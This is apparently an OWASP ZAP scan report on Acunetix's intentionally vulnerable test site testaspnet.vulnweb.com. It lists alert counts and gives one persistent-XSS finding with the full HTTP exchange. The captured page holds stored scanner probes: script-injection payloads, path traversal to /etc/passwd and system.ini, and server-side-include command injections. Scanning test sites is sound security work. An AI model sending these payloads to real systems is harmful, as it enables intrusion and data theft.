ZAP Scanning Report

Generated with ZAP on Mon 25 Jul 2022, at 21:33:02

About this report

Report parameters

Contexts

No contexts were selected, so all contexts were included by default.

Sites

The following sites were included:

  • http://testaspnet.vulnweb.com

(If no sites were selected, all sites were included by default.)

An included site must also be within one of the included contexts for its data to be included in the report.

Risk levels

Included: High, Medium, Low, Informational

Excluded: None

Confidence levels

Included: User Confirmed, High, Medium, Low

Excluded: User Confirmed, High, Medium, Low, False Positive

Summaries

Alert counts by risk and confidence

This table shows the number of alerts for each level of risk and confidence included in the report.

(The percentages in brackets represent the count as a percentage of the total number of alerts included in the report, rounded to one decimal place.)

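Rows are risk levels; columns are confidence levels.

| Risk          | User Confirmed | High       | Medium      | Low        | Total       |
|---------------|----------------|------------|-------------|------------|-------------|
| High          | 0 (0.0%)       | 0 (0.0%)   | 6 (3.3%)    | 15 (8.2%)  | 21 (11.5%)  |
| Medium        | 0 (0.0%)       | 0 (0.0%)   | 26 (14.2%)  | 0 (0.0%)   | 26 (14.2%)  |
| Low           | 0 (0.0%)       | 29 (15.8%) | 99 (54.1%)  | 4 (2.2%)   | 132 (72.1%) |
| Informational | 0 (0.0%)       | 0 (0.0%)   | 0 (0.0%)    | 4 (2.2%)   | 4 (2.2%)    |
| Total         | 0 (0.0%)       | 29 (15.8%) | 131 (71.6%) | 23 (12.6%) | 183 (100%)  |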

Alert counts by site and risk

This table shows, for each site for which one or more alerts were raised, the number of alerts raised at each risk level.

Alerts with a confidence level of "False Positive" have been excluded from these counts.

(The numbers in brackets are the number of alerts raised for the site at or above that risk level.)

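| Site                          | High (= High) | Medium (>= Medium) | Low (>= Low) | Informational (>= Informational) |
|-------------------------------|---------------|--------------------|--------------|----------------------------------|
| http://testaspnet.vulnweb.com | 21 (21)       | 26 (47)            | 132 (179)    | 4 (183)                          |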

Alert counts by alert type

This table shows the number of alerts of each alert type, together with the alert type's risk level.

(The percentages in brackets represent each count as a percentage, rounded to one decimal place, of the total number of alerts included in this report.)

| Alert type                                                                 | Risk          | Count      |
|----------------------------------------------------------------------------|---------------|------------|
| Cross Site Scripting (Persistent)                                          | High          | 1 (0.5%)   |
| Cross Site Scripting (Reflected)                                           | High          | 3 (1.6%)   |
| SQL Injection                                                              | High          | 2 (1.1%)   |
| Viewstate without MAC Signature (Unsure)                                   | High          | 15 (8.2%)  |
| X-Frame-Options Header Not Set                                             | Medium        | 26 (14.2%) |
| Cookie without SameSite Attribute                                          | Low           | 2 (1.1%)   |
| Server Leaks Information via "X-Powered-By" HTTP Response Header Field(s)  | Low           | 38 (20.8%) |
| Timestamp Disclosure - Unix                                                | Low           | 4 (2.2%)   |
| X-AspNet-Version Response Header                                           | Low           | 29 (15.8%) |
| X-Content-Type-Options Header Missing                                      | Low           | 34 (18.6%) |
| Absence of Anti-CSRF Tokens                                                | Low           | 25 (13.7%) |
| Charset Mismatch (Header Versus Meta Content-Type Charset)                 | Informational | 4 (2.2%)   |
| Total                                                                      |               | 183        |

Alerts

  1. Risk=High, Confidence=Medium (6)

    1. http://testaspnet.vulnweb.com (6)

      1. Cross Site Scripting (Persistent) (1)
        1. GET http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Alert tags
          Alert description

          Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.

          When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.

          There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.

          Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.

          Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.

          Other info

          Source URL: http://testaspnet.vulnweb.com/Comments.aspx?id=2

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          Content-Length: 0
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:07:41 GMT
          Content-Length: 35389
          
          
          Response body (35389 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<a href="ReadNews.aspx?id=2" id="anchNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</a>
          						<DIV id="divNewsShort" class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:36 PM</DIV><DIV class="CommentText">3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">http://3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">https://3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">http:\\3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">https:\\3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">//3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:38 PM</DIV><DIV class="CommentText">\\3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:38 PM</DIV><DIV class="CommentText">HtTp://3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:38 PM</DIV><DIV class="CommentText">HtTpS://3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:29 PM</DIV><DIV class="CommentText">zApPX3sS</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:16 PM</DIV><DIV class="CommentText">0W45pz4p</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:16 PM</DIV><DIV class="CommentText"></div><scrIpt>alert(1);</scRipt><div></DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText">"><!--#EXEC cmd="dir \"--><</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:41 PM</DIV><DIV class="CommentText">0W45pz4p</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:42 PM</DIV><DIV class="CommentText"></div><script>alert(1);</script><div></DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:31 PM</DIV><DIV class="CommentText">c:/Windows/system.ini</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">../../../../../../../../../../../../../../../../Windows/system.ini</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">c:\Windows\system.ini</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\system.ini</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">/etc/passwd</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">../../../../../../../../../../../../../../../../etc/passwd</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">c:/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">c:\</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:34 PM</DIV><DIV class="CommentText">../../../../../../../../../../../../../../../../</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:34 PM</DIV><DIV class="CommentText">WEB-INF/web.xml</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">WEB-INF\web.xml</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">/WEB-INF/web.xml</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">\WEB-INF\web.xml</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">thishouldnotexistandhopefullyitwillnot</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:11 PM</DIV><DIV class="CommentText">http://www.google.com/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:11 PM</DIV><DIV class="CommentText">http://www.google.com:80/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:11 PM</DIV><DIV class="CommentText">http://www.google.com</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">http://www.google.com/search?q=OWASP%20ZAP</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">http://www.google.com:80/search?q=OWASP%20ZAP</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">www.google.com/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">www.google.com:80/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">www.google.com</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:13 PM</DIV><DIV class="CommentText">www.google.com/search?q=OWASP%20ZAP</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:13 PM</DIV><DIV class="CommentText">www.google.com:80/search?q=OWASP%20ZAP</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText"><!--#EXEC cmd="ls /"--></DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText">"><!--#EXEC cmd="ls /"--><</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText"><!--#EXEC cmd="dir \"--></DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
